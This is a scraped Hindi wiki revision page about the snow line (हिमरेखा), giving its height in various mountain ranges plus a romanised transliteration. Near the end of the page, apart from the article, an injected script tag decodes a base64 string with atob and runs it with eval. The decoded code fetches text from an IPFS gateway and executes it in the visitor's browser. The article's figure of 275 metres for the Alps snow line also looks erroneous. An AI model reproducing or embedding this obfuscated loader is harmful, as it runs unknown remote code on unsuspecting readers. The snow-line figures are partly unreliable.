Difference between revisions of "हिमरेखा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
पहाड़ों की ऊँचाई की वह सीमा, जिसके ऊपरी भाग पर सदैव बर्फ़ जमी रहती है, हिमरेखा कहलाती है। हिमरेखा की ऊँचाई विभिन्न स्थानों पर भिन्न भिन्न होती है। भूमध्यरेखा पर यह ऊँचाई 4550 मीटर से 5460 मीटर तक हो सकती है जब कि ध्रुव प्रदेशों में हिमरेखा सागरतल के निकट रहती है। आल्प्स में हिमरेखा की ऊँचाई 275 मीटर, ग्रीनलैंड में 606 मीटर, पाइरेन्नीस में 1975 मीटर, कोलेरडो में 3792 मीटर तथा [[हिमालय]] में 4550 मीटर से 5150 मीटर है।
 
पहाड़ों की ऊँचाई की वह सीमा, जिसके ऊपरी भाग पर सदैव बर्फ़ जमी रहती है, हिमरेखा कहलाती है। हिमरेखा की ऊँचाई विभिन्न स्थानों पर भिन्न भिन्न होती है। भूमध्यरेखा पर यह ऊँचाई 4550 मीटर से 5460 मीटर तक हो सकती है जब कि ध्रुव प्रदेशों में हिमरेखा सागरतल के निकट रहती है। आल्प्स में हिमरेखा की ऊँचाई 275 मीटर, ग्रीनलैंड में 606 मीटर, पाइरेन्नीस में 1975 मीटर, कोलेरडो में 3792 मीटर तथा [[हिमालय]] में 4550 मीटर से 5150 मीटर है।
 
{{इन्हेंभीदेखें|हिमनद|हिमालय|हिमक्षेत्र|हिमाटोप}}
 
{{इन्हेंभीदेखें|हिमनद|हिमालय|हिमक्षेत्र|हिमाटोप}}
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Revision as of 09:42, 19 April 2011

paha doan ki ooanchaee ki vah sima, jisake oopari bhag par sadaiv barf jami rahati hai, himarekha kahalati hai. himarekha ki ooanchaee vibhinn sthanoan par bhinn bhinn hoti hai. bhoomadhyarekha par yah ooanchaee 4550 mitar se 5460 mitar tak ho sakati hai jab ki dhruv pradeshoan mean himarekha sagaratal ke nikat rahati hai. alps mean himarekha ki ooanchaee 275 mitar, grinalaiand mean 606 mitar, pairennis mean 1975 mitar, kolerado mean 3792 mitar tatha himalay mean 4550 mitar se 5150 mitar hai.

  1. REDIRECTsaancha:inhean bhi dekhean

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh